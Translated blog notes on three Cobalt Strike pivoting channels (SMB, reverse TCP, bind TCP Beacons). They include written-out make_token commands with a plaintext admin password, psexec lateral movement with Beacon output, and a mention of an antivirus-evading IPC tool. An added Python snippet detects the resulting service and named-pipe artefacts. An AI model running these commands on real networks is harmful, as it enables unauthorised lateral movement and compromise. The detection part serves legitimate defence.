Cobalt Strike: Three Unconventional Traffic Channels

Preface: notes for myself, so I do not forget them later.

SMB Beacon check-in:

Environment: you already have a pivot (springboard) machine; the target does not need to be able to reach the outside network, but it must be able to talk to the pivot over SMB.

Advantages: some resistance to tracing; the biggest advantage is bypassing the firewall.

Where does the firewall bypass come from?

A: Windows Defender Firewall lets SMB traffic through!

Limitation: the Beacon can only be brought online with psexec or a stageless payload.

Commands:

rev2self  // revert to the original token
make_token pengtest\administrator adexx!@#QWE  // forge a token
psexec WIN-CKT0M35R6UO ADMIN$ smb  // lateral movement with psexec

In theory, because a stageless payload and psexec cannot be made fileless, the Beacon may fail to check in when antivirus is present!

Why is that? Look into how stageless payloads and psexec work and you will see!

Command output:

beacon> rev2self
[*] Tasked beacon to revert token
[+] host called home, sent: 8 bytes
beacon> make_token pengtest\administrator adexx!@#QWE
[*] Tasked beacon to create a token for pengtest\administrator
[+] host called home, sent: 52 bytes
[+] Impersonated PENTEST\yuyonghu01
beacon> psexec WIN-CKT0M35R6UO ADMIN$ smb
[*] Tasked beacon to run windows/beacon_smb/bind_pipe (\\WIN-CKT0M35R6UO\pipe\status_7771) on WIN-CKT0M35R6UO via Service Control Manager (\\WIN-CKT0M35R6UO\ADMIN$\c31c12f.exe)
[+] host called home, sent: 219981 bytes
[+] received output:
Started service 8b04b51 on WIN-CKT0M35R6U

unlink temporarily disconnects from the target Beacon but does not exit its process.
link reconnects. Both are run on the Beacon that initiated the connection, that is, both are executed on the pivot machine!
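The psexec output above shows what this technique leaves on the target: a service installed via the Service Control Manager with a binary dropped into ADMIN$ under a short random name, and a named pipe called status_<digits> bound by the SMB Beacon. As an added example that is not part of the original post, the Python below turns those artefacts into simple detection logic for a defender. System event ID 7045 (service installed) and Sysmon event ID 17 (named pipe created) are real event IDs; the sample records are constructed, and the "7 hex characters" heuristic is an assumption based only on the names visible in this output (8b04b51, c31c12f.exe).

```python
import re
from typing import Dict, List

# Heuristics derived from the psexec output on this page (assumptions, not
# official indicators): the dropped service binary and the service name are
# 7 hex characters, the binary arrives via the ADMIN$ share, and the SMB
# Beacon binds a pipe named status_<digits>.
RANDOM_HEX_EXE = re.compile(r"(?:^|\\)[0-9a-f]{7}\.exe$", re.IGNORECASE)
RANDOM_HEX_SVC = re.compile(r"^[0-9a-f]{7}$", re.IGNORECASE)
BEACON_PIPE = re.compile(r"^\\?status_\d+$", re.IGNORECASE)   # e.g. \status_7771
ADMIN_SHARE = re.compile(r"^\\\\[^\\]+\\ADMIN\$\\", re.IGNORECASE)

# Constructed sample records (not real telemetry), shaped loosely like
# System event 7045 (service installed) and Sysmon event 17 (pipe created).
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"id": 7045, "host": "WIN-CKT0M35R6UO", "service": "8b04b51",
     "image": r"\\WIN-CKT0M35R6UO\ADMIN$\c31c12f.exe"},
    {"id": 7045, "host": "WIN-CKT0M35R6UO", "service": "Spooler",
     "image": r"C:\Windows\System32\spoolsv.exe"},
    {"id": 17, "host": "WIN-CKT0M35R6UO", "pipe": r"\status_7771",
     "image": r"C:\Windows\c31c12f.exe"},
    {"id": 17, "host": "WIN-CKT0M35R6UO", "pipe": r"\lsass",
     "image": r"C:\Windows\System32\lsass.exe"},
]


def flag_event(ev: Dict[str, object]) -> List[str]:
    """Return the list of reasons an event looks like a psexec-style SMB Beacon
    install; an empty list means nothing matched."""
    reasons: List[str] = []
    image = str(ev.get("image", ""))
    if ev.get("id") == 7045:
        if ADMIN_SHARE.match(image):
            reasons.append("service binary installed from the ADMIN$ share")
        if RANDOM_HEX_SVC.match(str(ev.get("service", ""))):
            reasons.append("service name is 7 random hex characters")
    if ev.get("id") == 17 and BEACON_PIPE.match(str(ev.get("pipe", ""))):
        reasons.append("named pipe matches the status_<n> SMB Beacon pattern")
    if RANDOM_HEX_EXE.search(image):
        reasons.append("binary name is 7 random hex characters")
    return reasons


def scan(events: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Run flag_event over a batch of records and keep only the hits."""
    findings = []
    for ev in events:
        reasons = flag_event(ev)
        if reasons:
            findings.append({"host": ev["host"], "id": ev["id"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f['host']} event {f['id']}: " + "; ".join(f["reasons"]))
```

Because these service and pipe names are defaults that an operator can change, the name-based rules are weak on their own; the more durable signal is any service whose binary path is a UNC path into ADMIN$, which legitimate software almost never does. And since the post's own point is that Windows Defender Firewall lets SMB through, the host-level mitigation is a firewall rule that blocks inbound TCP 445 between workstations rather than relying on the default profile.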

Reverse TCP Beacon check-in:

Note: this listener cannot be added directly under Listeners; you have to right-click the Beacon and add it via Beacon - Pivoting - Listener.

Then generate a stageless payload for lateral movement. If net use turns out not to work, remember the IPC.exe I wrote a long time ago: because it calls the Windows API directly, it has some effect in evading AV!

It establishes an IPC connection and creates a scheduled task to run the specified program.

Also note that once unlink is run here, the connection cannot be re-established.


Bind TCP Beacon check-in:

Environment: you already have a pivot (springboard) machine; the target does not need to be able to reach the outside network, but it must be able to talk to the pivot over TCP.

Limitation: because this is a forward (bind) connection, only a stageless payload or psexec can be used.

Disadvantage: even if you change the default port 4444 to 5555 when adding the listener, the target host will still listen on 4444. I can only put this down to how the CS author wrote it, but in fact it can still be changed!

connect reconnects.

unlink drops the communication, but you can still reconnect afterwards.

Things to note:

1. If the same Beacon is both the link and the connect machine and you run unlink on it, both connections will be dropped.

2. This listener cannot be added directly under Listeners; right-click the Beacon and add it via Beacon - Pivoting - Listener.

Reference article: https://www.chabug.org/tools/755.html

Source: www.cnblogs.com/zpchcbd/p/12507978.html